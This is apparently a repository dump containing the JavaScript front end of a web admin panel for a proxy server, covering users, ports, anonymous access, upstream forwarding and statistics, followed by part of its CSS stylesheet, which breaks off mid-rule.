panel.classList.remove('active');
}
});
});
});
// 处理退出登录
logoutBtn.addEventListener('click', function() {
localStorage.removeItem('token');
window.location.href = '/';
});
// 处理启动代理服务器
startProxyBtn.addEventListener('click', function() {
fetch('/api/proxy/start', {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
updateProxyStatus();
} else {
alert('启动服务失败: ' + data.message);
}
})
.catch(error => {
console.error('启动服务请求失败:', error);
alert('启动服务请求失败,请稍后重试');
});
});
// 处理停止代理服务器
stopProxyBtn.addEventListener('click', function() {
fetch('/api/proxy/stop', {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
updateProxyStatus();
} else {
alert('停止服务失败: ' + data.message);
}
})
.catch(error => {
console.error('停止服务请求失败:', error);
alert('停止服务请求失败,请稍后重试');
});
});
// 处理添加用户
addUserForm.addEventListener('submit', function(e) {
e.preventDefault();
const username = document.getElementById('new-username').value;
const password = document.getElementById('new-password').value;
const noAuth = document.getElementById('no-auth-user').checked;
// 如果选择了"无需认证"但未填写用户名,则提示错误
if (noAuth && !username.trim()) {
alert('即使是无需认证的用户,也需要设置一个用户名作为标识');
return;
}
// 如果未选择"无需认证",但未填写密码,则提示错误
if (!noAuth && !password.trim()) {
alert('请输入用户密码');
return;
}
fetch('/api/users', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
username: username,
password: noAuth ? "" : password,
no_auth: noAuth
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
// 重置表单
addUserForm.reset();
// 刷新用户列表
loadUsers();
} else {
alert('添加用户失败: ' + data.message);
}
})
.catch(error => {
console.error('添加用户请求失败:', error);
alert('添加用户请求失败,请稍后重试');
});
});
// 处理添加代理端口
addPortForm.addEventListener('submit', function(e) {
e.preventDefault();
const listenAddr = document.getElementById('new-port-addr').value;
const allowAnonymous = document.getElementById('new-port-anonymous').checked;
// 验证监听地址
if (!listenAddr.trim()) {
alert('监听地址不能为空');
return;
}
fetch('/api/proxy/ports', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
listen_addr: listenAddr,
allow_anonymous: allowAnonymous
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
// 重置表单
addPortForm.reset();
// 刷新端口列表
loadProxyPorts();
} else {
alert('添加代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('添加代理端口请求失败:', error);
alert('添加代理端口请求失败,请稍后重试');
});
});
// 处理保存设置
settingsForm.addEventListener('submit', function(e) {
e.preventDefault();
const proxyPort = document.getElementById('proxy-port').value;
const webPort = document.getElementById('web-port').value;
const adminUsername = document.getElementById('admin-username').value;
const adminPassword = document.getElementById('admin-password').value;
const useForwardProxy = document.getElementById('use-forward-proxy').checked;
const allowAnonymous = document.getElementById('allow-anonymous').checked;
const remoteProxyAddr = document.getElementById('remote-proxy-addr').value;
const remoteProxyUser = document.getElementById('remote-proxy-user').value;
const remoteProxyPass = document.getElementById('remote-proxy-pass').value;
// 如果启用转发代理但未填写代理地址,显示提示
if (useForwardProxy && !remoteProxyAddr) {
alert('启用代理转发时,远程代理地址不能为空');
return;
}
fetch('/api/settings', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
proxy_port: proxyPort,
web_port: webPort,
admin_username: adminUsername,
admin_password: adminPassword,
use_forward_proxy: useForwardProxy,
allow_anonymous: allowAnonymous,
remote_proxy_addr: remoteProxyAddr,
remote_proxy_user: remoteProxyUser,
remote_proxy_pass: remoteProxyPass
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
alert('设置已保存');
// 刷新设置
loadSettings();
// 刷新代理状态
updateProxyStatus();
// 刷新端口列表
loadProxyPorts();
} else {
alert('保存设置失败: ' + data.message);
}
})
.catch(error => {
console.error('保存设置请求失败:', error);
alert('保存设置请求失败,请稍后重试');
});
});
// 处理重置统计
resetStatsBtn.addEventListener('click', function() {
if (confirm('确定要重置所有统计数据吗?')) {
fetch('/api/stats/reset', {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadStats();
} else {
alert('重置统计失败: ' + data.message);
}
})
.catch(error => {
console.error('重置统计请求失败:', error);
alert('重置统计请求失败,请稍后重试');
});
}
});
// 更新代理状态
function updateProxyStatus() {
fetch('/api/proxy/status', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const status = data.data;
const statusElement = document.getElementById('proxy-status');
const addressElement = document.getElementById('proxy-address');
const startTimeElement = document.getElementById('start-time');
const connectionCountElement = document.getElementById('connection-count');
// 更新状态显示
statusElement.textContent = status.running ? '运行中' : '已停止';
statusElement.className = 'value status-indicator ' + (status.running ? 'running' : 'stopped');
addressElement.textContent = status.address;
if (status.running) {
startTimeElement.textContent = new Date(status.start_time).toLocaleString();
connectionCountElement.textContent = status.connection_count;
// 更新按钮状态
startProxyBtn.disabled = true;
stopProxyBtn.disabled = false;
} else {
startTimeElement.textContent = '-';
connectionCountElement.textContent = '0';
// 更新按钮状态
startProxyBtn.disabled = false;
stopProxyBtn.disabled = true;
}
}
})
.catch(error => {
console.error('获取代理状态失败:', error);
});
}
// 加载用户列表
function loadUsers() {
fetch('/api/users', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const userList = document.getElementById('user-list');
userList.innerHTML = '';
data.data.forEach(user => {
const row = document.createElement('tr');
const usernameCell = document.createElement('td');
usernameCell.textContent = user.username;
const passwordCell = document.createElement('td');
passwordCell.textContent = user.no_auth ? '无需认证' : '••••••••';
const actionCell = document.createElement('td');
const deleteBtn = document.createElement('button');
deleteBtn.textContent = '删除';
deleteBtn.className = 'btn-delete';
deleteBtn.addEventListener('click', function() {
deleteUser(user.username);
});
actionCell.appendChild(deleteBtn);
row.appendChild(usernameCell);
row.appendChild(passwordCell);
row.appendChild(actionCell);
userList.appendChild(row);
});
}
})
.catch(error => {
console.error('获取用户列表失败:', error);
});
}
// 删除用户
function deleteUser(username) {
if (confirm(`确定要删除用户 "${username}" 吗?`)) {
fetch(`/api/users/${username}`, {
method: 'DELETE',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadUsers();
} else {
alert('删除用户失败: ' + data.message);
}
})
.catch(error => {
console.error('删除用户请求失败:', error);
alert('删除用户请求失败,请稍后重试');
});
}
}
// 加载设置
function loadSettings() {
fetch('/api/settings', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const settings = data.data;
document.getElementById('proxy-port').value = settings.proxy_port;
document.getElementById('web-port').value = settings.web_port;
document.getElementById('admin-username').value = settings.admin_username;
document.getElementById('use-forward-proxy').checked = settings.use_forward_proxy || false;
document.getElementById('allow-anonymous').checked = settings.allow_anonymous || false;
// 设置远程代理信息
if (settings.remote_proxy_addr) {
document.getElementById('remote-proxy-addr').value = settings.remote_proxy_addr;
}
if (settings.remote_proxy_user) {
document.getElementById('remote-proxy-user').value = settings.remote_proxy_user;
}
// 显示/隐藏远程代理设置区域
const remoteProxySettings = document.getElementById('remote-proxy-settings');
remoteProxySettings.style.display = settings.use_forward_proxy ? 'block' : 'none';
}
})
.catch(error => {
console.error('获取设置失败:', error);
});
}
// 加载统计信息
function loadStats() {
fetch('/api/stats', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const stats = data.data;
// 更新总请求数
document.getElementById('total-requests').textContent = stats.total_requests;
// 更新域名统计
const domainStatsElement = document.getElementById('domain-stats');
domainStatsElement.innerHTML = '';
if (stats.domain_stats.length === 0) {
const row = document.createElement('tr');
const cell = document.createElement('td');
cell.colSpan = 3;
cell.textContent = '暂无数据';
cell.style.textAlign = 'center';
row.appendChild(cell);
domainStatsElement.appendChild(row);
} else {
stats.domain_stats.forEach(domain => {
const row = document.createElement('tr');
const domainCell = document.createElement('td');
domainCell.textContent = domain.domain;
const countCell = document.createElement('td');
countCell.textContent = domain.count;
const lastVisitCell = document.createElement('td');
lastVisitCell.textContent = new Date(domain.last_visit).toLocaleString();
row.appendChild(domainCell);
row.appendChild(countCell);
row.appendChild(lastVisitCell);
domainStatsElement.appendChild(row);
});
}
}
})
.catch(error => {
console.error('获取统计信息失败:', error);
});
}
// 加载代理端口列表
function loadProxyPorts() {
fetch('/api/proxy/ports', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const portsList = document.getElementById('ports-list');
portsList.innerHTML = '';
data.data.forEach(port => {
const row = document.createElement('tr');
const addrCell = document.createElement('td');
addrCell.textContent = port.listen_addr;
const statusCell = document.createElement('td');
const statusIndicator = document.createElement('span');
statusIndicator.className = 'status-indicator ' + (port.running ? 'running' : 'stopped');
statusIndicator.textContent = port.running ? '运行中' : '已停止';
statusCell.appendChild(statusIndicator);
const connCell = document.createElement('td');
connCell.textContent = port.connection_count || 0;
const actionCell = document.createElement('td');
// 启动/停止按钮
const toggleBtn = document.createElement('button');
toggleBtn.className = 'btn-action ' + (port.running ? 'btn-stop' : 'btn-start');
toggleBtn.textContent = port.running ? '停止' : '启动';
toggleBtn.addEventListener('click', function() {
if (port.running) {
stopProxyPort(port.id);
} else {
startProxyPort(port.id);
}
});
// 编辑按钮
const editBtn = document.createElement('button');
editBtn.className = 'btn-edit';
editBtn.textContent = '编辑';
editBtn.addEventListener('click', function() {
// 确保传递running状态
port.running = port.running;
editProxyPort(port);
});
// 删除按钮
const deleteBtn = document.createElement('button');
deleteBtn.className = 'btn-delete';
deleteBtn.textContent = '删除';
deleteBtn.addEventListener('click', function() {
deleteProxyPort(port.id);
});
actionCell.appendChild(toggleBtn);
actionCell.appendChild(editBtn);
actionCell.appendChild(deleteBtn);
row.appendChild(addrCell);
row.appendChild(statusCell);
row.appendChild(connCell);
row.appendChild(actionCell);
portsList.appendChild(row);
});
}
})
.catch(error => {
console.error('获取代理端口列表失败:', error);
});
}
// 启动代理端口
function startProxyPort(id) {
fetch(`/api/proxy/ports/${id}/start`, {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadProxyPorts();
} else {
alert('启动代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('启动代理端口请求失败:', error);
alert('启动代理端口请求失败,请稍后重试');
});
}
// 停止代理端口
function stopProxyPort(id) {
fetch(`/api/proxy/ports/${id}/stop`, {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadProxyPorts();
} else {
alert('停止代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('停止代理端口请求失败:', error);
alert('停止代理端口请求失败,请稍后重试');
});
}
// 编辑代理端口
function editProxyPort(port) {
// 创建编辑对话框
const dialogHTML = `
<div class="modal-overlay port-detail-modal" id="edit-port-modal">
<div class="modal-content">
<h3>管理代理端口 - ${port.listen_addr}</h3>
<div class="port-detail-tabs">
<div class="port-detail-tab active" data-tab="basic">基本设置</div>
<div class="port-detail-tab" data-tab="users">用户管理</div>
<div class="port-detail-tab" data-tab="forward">代理转发</div>
</div>
<div class="port-detail-panel active" id="basic-panel">
<div class="port-info">
<div class="port-info-item">
<div class="port-info-label">端口ID:</div>
<div class="port-info-value">${port.id}</div>
</div>
<div class="port-info-item">
<div class="port-info-label">连接数:</div>
<div class="port-info-value">${port.status ? port.status.connection_count : 0}</div>
</div>
</div>
<form id="edit-port-basic-form" onsubmit="return false;">
<input type="hidden" id="port-id" value="${port.id}">
<div class="form-group">
<label for="edit-port-addr">监听地址 (格式: IP:端口)</label>
<input type="text" id="edit-port-addr" name="listen_addr" value="${port.listen_addr}" required ${port.running ? 'disabled' : ''}>
${port.running ? '<p class="form-hint">代理服务运行中,无法修改监听地址。请先停止代理服务。</p>' : ''}
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="edit-port-enabled" name="enabled" ${port.enabled ? 'checked' : ''}>
<label for="edit-port-enabled">启用</label>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="edit-port-anonymous" name="allow_anonymous" ${port.allow_anonymous ? 'checked' : ''}>
<label for="edit-port-anonymous">允许匿名访问 (不需要账号密码)</label>
</div>
<button type="button" id="save-port-basic" class="btn-save">保存基本设置</button>
</form>
</div>
<div class="port-detail-panel" id="users-panel">
<h4>端口专用用户</h4>
<p>您可以为此端口添加专用的用户账号,这些账号只能通过此端口访问代理服务。</p>
<table class="port-users-table">
<thead>
<tr>
<th>用户名</th>
<th>密码</th>
<th>操作</th>
</tr>
</thead>
<tbody id="port-users-list">
<!-- 用户列表将通过JavaScript动态生成 -->
</tbody>
</table>
<form id="add-port-user-form" onsubmit="return false;">
<input type="hidden" id="port-id" value="${port.id}">
<h4>添加专用用户</h4>
<div class="form-group">
<label for="port-new-username">用户名</label>
<input type="text" id="port-new-username" name="username" required>
</div>
<div class="form-group">
<label for="port-new-password">密码</label>
<input type="password" id="port-new-password" name="password" required>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="port-no-auth-user" name="no_auth">
<label for="port-no-auth-user">无需认证的用户(不需要账号密码)</label>
</div>
<button type="button" id="add-port-user-btn" class="btn-add">添加用户</button>
</form>
</div>
<div class="port-detail-panel" id="forward-panel">
<h4>代理转发设置</h4>
<p>您可以将此端口的请求转发到另一个代理服务器。${port.running ? '<strong>注意:修改设置后,代理服务将自动重启以应用新设置。</strong>' : ''}</p>
<form id="edit-port-forward-form" onsubmit="return false;">
<input type="hidden" id="port-id-forward" value="${port.id}">
<div class="form-group checkbox-group">
<input type="checkbox" id="port-use-forward-proxy" name="use_forward_proxy">
<label for="port-use-forward-proxy">启用代理转发</label>
</div>
<div id="port-forward-settings" class="disabled">
<div class="form-group">
<label for="port-remote-proxy-addr">远程代理地址 (格式: IP:端口)</label>
<input type="text" id="port-remote-proxy-addr" name="remote_proxy_addr" placeholder="例如: 160.20.18.17:3989">
</div>
<div class="form-group">
<label for="port-remote-proxy-user">远程代理用户名</label>
<input type="text" id="port-remote-proxy-user" name="remote_proxy_user" placeholder="例如: admin">
</div>
<div class="form-group">
<label for="port-remote-proxy-pass">远程代理密码</label>
<input type="password" id="port-remote-proxy-pass" name="remote_proxy_pass" placeholder="输入远程代理密码">
</div>
</div>
<button type="button" id="save-port-forward" class="btn-save">保存转发设置</button>
</form>
</div>
<div class="modal-actions">
<button class="btn-cancel" id="close-port-modal">关闭</button>
</div>
</div>
</div>
`;
// 添加对话框到DOM
document.body.insertAdjacentHTML('beforeend', dialogHTML);
// 监听代理转发复选框变化
document.getElementById('port-use-forward-proxy').addEventListener('change', function() {
const forwardSettings = document.getElementById('port-forward-settings');
if (this.checked) {
forwardSettings.classList.remove('disabled');
} else {
forwardSettings.classList.add('disabled');
}
});
// 处理关闭按钮
document.getElementById('close-port-modal').addEventListener('click', function() {
const modal = document.getElementById('edit-port-modal');
modal.remove();
});
// 处理标签切换
const tabs = document.querySelectorAll('.port-detail-tab');
const panels = document.querySelectorAll('.port-detail-panel');
tabs.forEach(tab => {
tab.addEventListener('click', function() {
const tabId = this.getAttribute('data-tab');
// 更新活动标签
tabs.forEach(t => t.classList.remove('active'));
this.classList.add('active');
// 显示对应面板
panels.forEach(panel => {
if (panel.id === tabId + '-panel') {
panel.classList.add('active');
} else {
panel.classList.remove('active');
}
});
// 如果切换到代理转发选项卡,加载转发设置
if (tabId === 'forward') {
loadPortForwardSettings(port.id);
}
});
});
// 处理添加用户按钮点击
document.getElementById('add-port-user-btn').addEventListener('click', function() {
const portId = port.id;
const username = document.getElementById('port-new-username').value;
const password = document.getElementById('port-new-password').value;
const noAuth = document.getElementById('port-no-auth-user').checked;
// 如果选择了"无需认证"但未填写用户名,则提示错误
if (noAuth && !username.trim()) {
alert('即使是无需认证的用户,也需要设置一个用户名作为标识');
return;
}
// 如果未选择"无需认证",但未填写密码,则提示错误
if (!noAuth && !password.trim()) {
alert('请输入用户密码');
return;
}
fetch(`/api/proxy/ports/${portId}/users`, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
username: username,
password: noAuth ? "" : password,
no_auth: noAuth
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
// 清空表单
document.getElementById('port-new-username').value = '';
document.getElementById('port-new-password').value = '';
document.getElementById('port-no-auth-user').checked = false;
// 刷新用户列表
loadPortUsers(portId);
alert('用户已添加');
} else {
alert('添加用户失败: ' + data.message);
}
})
.catch(error => {
console.error('添加用户请求失败:', error);
alert('添加用户请求失败,请稍后重试');
});
});
// 处理保存基本设置按钮点击
document.getElementById('save-port-basic').addEventListener('click', function() {
const portId = document.getElementById('port-id').value;
const listenAddr = document.getElementById('edit-port-addr').value;
const enabled = document.getElementById('edit-port-enabled').checked;
const allowAnonymous = document.getElementById('edit-port-anonymous').checked;
// 验证监听地址
if (!listenAddr.trim()) {
alert('监听地址不能为空');
return;
}
fetch(`/api/proxy/ports/${portId}`, {
method: 'PUT',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
listen_addr: listenAddr,
enabled: enabled,
allow_anonymous: allowAnonymous
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
alert('基本设置已保存');
// 刷新端口列表
loadProxyPorts();
} else {
alert('更新代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('更新代理端口请求失败:', error);
alert('更新代理端口请求失败,请稍后重试');
});
});
// 处理保存转发设置按钮点击
document.getElementById('save-port-forward').addEventListener('click', function() {
const portId = document.getElementById('port-id-forward').value;
const useForwardProxy = document.getElementById('port-use-forward-proxy').checked;
const remoteProxyAddr = document.getElementById('port-remote-proxy-addr').value;
const remoteProxyUser = document.getElementById('port-remote-proxy-user').value;
const remoteProxyPass = document.getElementById('port-remote-proxy-pass').value;
console.log("保存转发设置:", {
portId,
useForwardProxy,
remoteProxyAddr,
remoteProxyUser,
remoteProxyPass: remoteProxyPass ? "已设置" : "未设置"
});
// 如果启用转发代理但未填写代理地址,显示提示
if (useForwardProxy && !remoteProxyAddr) {
alert('启用代理转发时,远程代理地址不能为空');
return;
}
fetch(`/api/proxy/ports/${portId}/forward`, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
use_forward_proxy: useForwardProxy,
remote_proxy_addr: remoteProxyAddr,
remote_proxy_user: remoteProxyUser,
remote_proxy_pass: remoteProxyPass
})
})
.then(response => {
console.log("响应状态:", response.status);
return response.json();
})
.then(data => {
console.log("响应数据:", data);
if (data.success) {
if (data.data && data.data.restarted) {
alert('代理转发设置已保存,代理服务已重启以应用新设置');
} else {
alert('代理转发设置已保存');
}
// 刷新端口列表以显示最新状态
loadProxyPorts();
} else {
alert('更新代理转发设置失败: ' + data.message);
}
})
.catch(error => {
console.error('更新代理转发设置请求失败:', error);
alert('更新代理转发设置请求失败,请稍后重试');
});
});
// 监听无需认证复选框变化
document.getElementById('port-no-auth-user').addEventListener('change', function() {
const passwordInput = document.getElementById('port-new-password');
if (this.checked) {
passwordInput.disabled = true;
passwordInput.required = false;
passwordInput.value = '';
} else {
passwordInput.disabled = false;
passwordInput.required = true;
}
});
// 加载端口专用用户
loadPortUsers(port.id);
// 加载端口代理转发设置
loadPortForwardSettings(port.id);
}
// 加载端口代理转发设置
function loadPortForwardSettings(portId) {
fetch(`/api/proxy/ports/${portId}/forward`, {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const settings = data.data;
// 更新表单字段
document.getElementById('port-use-forward-proxy').checked = settings.use_forward_proxy;
if (settings.remote_proxy_addr) {
document.getElementById('port-remote-proxy-addr').value = settings.remote_proxy_addr;
}
if (settings.remote_proxy_user) {
document.getElementById('port-remote-proxy-user').value = settings.remote_proxy_user;
}
// 更新转发设置区域的显示状态
const forwardSettings = document.getElementById('port-forward-settings');
if (settings.use_forward_proxy) {
forwardSettings.classList.remove('disabled');
} else {
forwardSettings.classList.add('disabled');
}
}
})
.catch(error => {
console.error('获取端口代理转发设置失败:', error);
});
}
// 加载端口专用用户
function loadPortUsers(portId) {
fetch(`/api/proxy/ports/${portId}/users`, {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const usersList = document.getElementById('port-users-list');
usersList.innerHTML = '';
if (data.data.length === 0) {
const row = document.createElement('tr');
const cell = document.createElement('td');
cell.colSpan = 3;
cell.style.textAlign = 'center';
cell.textContent = '暂无专用用户';
row.appendChild(cell);
usersList.appendChild(row);
} else {
data.data.forEach(user => {
const row = document.createElement('tr');
const usernameCell = document.createElement('td');
usernameCell.textContent = user.username;
const passwordCell = document.createElement('td');
passwordCell.textContent = user.no_auth ? '无需密码' : '******';
const actionCell = document.createElement('td');
const deleteBtn = document.createElement('button');
deleteBtn.textContent = '删除';
deleteBtn.className = 'btn-delete';
deleteBtn.addEventListener('click', function() {
deletePortUser(portId, user.username);
});
actionCell.appendChild(deleteBtn);
row.appendChild(usernameCell);
row.appendChild(passwordCell);
row.appendChild(actionCell);
usersList.appendChild(row);
});
}
}
})
.catch(error => {
console.error('获取端口用户列表失败:', error);
});
}
// 删除端口专用用户
function deletePortUser(portId, username) {
if (confirm(`确定要删除用户 "${username}" 吗?`)) {
fetch(`/api/proxy/ports/${portId}/users/${username}`, {
method: 'DELETE',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadPortUsers(portId);
alert('用户已删除');
} else {
alert('删除用户失败: ' + data.message);
}
})
.catch(error => {
console.error('删除用户请求失败:', error);
alert('删除用户请求失败,请稍后重试');
});
}
}
// 删除代理端口
function deleteProxyPort(id) {
if (confirm('确定要删除此代理端口吗?')) {
fetch(`/api/proxy/ports/${id}`, {
method: 'DELETE',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadProxyPorts();
} else {
alert('删除代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('删除代理端口请求失败:', error);
alert('删除代理端口请求失败,请稍后重试');
});
}
}
}); |
2833844911/cyTlsXhr | 10,733 | static/css/style.css | /* 全局样式 */
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Microsoft YaHei', Arial, sans-serif;
}
body {
background-color: #f5f5f5;
color: #333;
line-height: 1.6;
}
/* 登录页面样式 */
.login-container {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
background-color: #f0f2f5;
}
.login-box {
background-color: #fff;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
padding: 30px;
width: 380px;
}
.login-box h2 {
text-align: center;
margin-bottom: 24px;
color: #1890ff;
}
.form-group {
margin-bottom: 20px;
}
.form-group label {
display: block;
margin-bottom: 8px;
font-weight: 500;
}
.form-group input {
width: 100%;
padding: 10px 12px;
border: 1px solid #d9d9d9;
border-radius: 4px;
font-size: 14px;
transition: all 0.3s;
}
.form-group input:focus {
border-color: #1890ff;
box-shadow: 0 0 0 2px rgba(24, 144, 255, 0.2);
outline: none;
}
.btn-login {
width: 100%;
padding: 10px 12px;
background-color: #1890ff;
color: white;
border: none;
border-radius: 4px;
font-size: 16px;
cursor: pointer;
transition: background-color 0.3s;
}
.btn-login:hover {
background-color: #40a9ff;
}
.error-message {
color: #f5222d;
margin-bottom: 16px;
text-align: center;
min-height: 20px;
}
/* 仪表盘样式 */
.dashboard-container {
display: flex;
flex-direction: column;
min-height: 100vh;
}
.dashboard-header {
background-color: #001529;
color: white;
padding: 0 20px;
height: 64px;
display: flex;
justify-content: space-between;
align-items: center;
box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1);
}
.dashboard-header h1 {
font-size: 20px;
margin: 0;
}
.user-info {
display: flex;
align-items: center;
}
.user-info span {
margin-right: 16px;
}
.btn-logout {
background-color: transparent;
border: 1px solid rgba(255, 255, 255, 0.5);
color: white;
padding: 4px 12px;
border-radius: 4px;
cursor: pointer;
transition: all 0.3s;
}
.btn-logout:hover {
background-color: rgba(255, 255, 255, 0.1);
}
.dashboard-content {
display: flex;
flex: 1;
}
.sidebar {
width: 200px;
background-color: #001529;
color: white;
padding-top: 20px;
}
.nav-menu {
list-style: none;
}
.nav-menu li {
padding: 12px 20px;
cursor: pointer;
transition: background-color 0.3s;
}
.nav-menu li:hover {
background-color: #1890ff;
}
.nav-menu li.active {
background-color: #1890ff;
font-weight: 500;
}
.main-content {
flex: 1;
padding: 20px;
background-color: #f0f2f5;
}
.panel {
display: none;
background-color: white;
border-radius: 8px;
box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
padding: 20px;
margin-bottom: 20px;
}
.panel.active {
display: block;
}
.panel h2 {
margin-bottom: 20px;
color: #1890ff;
border-bottom: 1px solid #f0f0f0;
padding-bottom: 10px;
}
/* 状态卡片样式 */
.status-card {
background-color: white;
border-radius: 8px;
padding: 20px;
}
.status-item {
display: flex;
margin-bottom: 16px;
align-items: center;
}
.status-item .label {
width: 120px;
font-weight: 500;
}
.status-indicator {
padding: 4px 8px;
border-radius: 4px;
font-size: 14px;
}
.status-indicator.running {
background-color: #52c41a;
color: white;
}
.status-indicator.stopped {
background-color: #f5222d;
color: white;
}
.status-actions {
margin-top: 20px;
display: flex;
gap: 10px;
}
.btn-action {
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
border: none;
transition: all 0.3s;
}
#start-proxy {
background-color: #52c41a;
color: white;
}
#start-proxy:hover {
background-color: #73d13d;
}
#stop-proxy {
background-color: #f5222d;
color: white;
}
#stop-proxy:hover {
background-color: #ff4d4f;
}
#stop-proxy:disabled {
background-color: #d9d9d9;
cursor: not-allowed;
}
/* 用户管理样式 */
.user-list-container {
display: flex;
gap: 20px;
}
.user-table {
flex: 2;
border-collapse: collapse;
width: 100%;
}
.user-table th, .user-table td {
border: 1px solid #f0f0f0;
padding: 12px;
text-align: left;
}
.user-table th {
background-color: #fafafa;
font-weight: 500;
}
.user-table tr:hover {
background-color: #f5f5f5;
}
.add-user-form {
flex: 1;
background-color: #fafafa;
padding: 20px;
border-radius: 8px;
}
.add-user-form h3 {
margin-bottom: 16px;
color: #1890ff;
}
.btn-add {
background-color: #1890ff;
color: white;
border: none;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
}
.btn-add:hover {
background-color: #40a9ff;
}
.btn-delete {
background-color: #f5222d;
color: white;
border: none;
padding: 4px 8px;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
}
.btn-delete:hover {
background-color: #ff4d4f;
}
/* 设置面板样式 */
.settings-form {
max-width: 500px;
}
.btn-save {
background-color: #1890ff;
color: white;
border: none;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
margin-top: 10px;
}
.btn-save:hover {
background-color: #40a9ff;
}
/* 统计面板样式 */
.stats-summary {
display: flex;
flex-direction: column;
gap: 20px;
}
.stats-card {
background-color: white;
border-radius: 8px;
padding: 20px;
box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
}
.stats-card h3 {
margin-bottom: 16px;
color: #1890ff;
}
.stats-value {
font-size: 32px;
font-weight: bold;
color: #1890ff;
}
.stats-table {
width: 100%;
border-collapse: collapse;
}
.stats-table th, .stats-table td {
border: 1px solid #f0f0f0;
padding: 12px;
text-align: left;
}
.stats-table th {
background-color: #fafafa;
font-weight: 500;
}
.stats-table-container {
max-height: 300px;
overflow-y: auto;
}
.btn-reset {
background-color: #faad14;
color: white;
border: none;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
align-self: flex-start;
}
.btn-reset:hover {
background-color: #ffc53d;
}
/* 添加复选框样式 */
.checkbox-group {
display: flex;
align-items: center;
margin-bottom: 15px;
}
.checkbox-group input[type="checkbox"] {
margin-right: 10px;
width: auto;
height: auto;
}
.checkbox-group label {
margin: 0;
font-weight: normal;
}
/* 多端口管理样式 */
.ports-container {
display: flex;
flex-direction: column;
gap: 20px;
}
.ports-list-container {
background-color: white;
border-radius: 8px;
box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
padding: 20px;
overflow: auto;
}
.ports-table {
width: 100%;
border-collapse: collapse;
}
.ports-table th, .ports-table td {
border: 1px solid #f0f0f0;
padding: 12px;
text-align: left;
}
.ports-table th {
background-color: #fafafa;
font-weight: 500;
}
.ports-table tr:hover {
background-color: #f5f5f5;
}
.port-actions {
display: flex;
gap: 5px;
}
.btn-start {
background-color: #52c41a;
color: white;
border: none;
padding: 4px 8px;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
}
.btn-start:hover {
background-color: #73d13d;
}
.btn-start:disabled {
background-color: #d9d9d9;
cursor: not-allowed;
}
.btn-stop {
background-color: #f5222d;
color: white;
border: none;
padding: 4px 8px;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
}
.btn-stop:hover {
background-color: #ff4d4f;
}
.btn-edit {
background-color: #1890ff;
color: white;
border: none;
